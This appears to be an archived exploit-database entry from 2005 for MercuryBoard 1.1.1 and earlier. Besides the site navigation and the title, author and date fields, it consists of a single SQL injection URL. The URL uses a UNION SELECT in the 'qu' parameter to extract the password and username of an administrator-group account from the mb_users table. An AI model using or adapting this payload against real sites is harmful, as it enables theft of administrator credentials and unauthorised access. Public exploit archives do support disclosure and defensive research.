[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : MercuryBoard <= 1.1.1 Working Sql Injection
# Published : 2005-02-12
# Author : Zeelock
# Previous Title : vBulletin <= 3.0.4 "forumdisplay.php" Code Execution
# Next Title : MyPHP Forum 1.0 SQL Injection Exploit


# little late posting this /str0ke

Exploit:

http://www.site.com/mercuryboard/index.php?a=post&s=reply&t=1&qu=10000%20UNION%20SELECT%20user_password,user_name%20from%20mb_users%20where%20user_group%20=%201%20limit%201/*

# www.Syue.com [2005-02-12]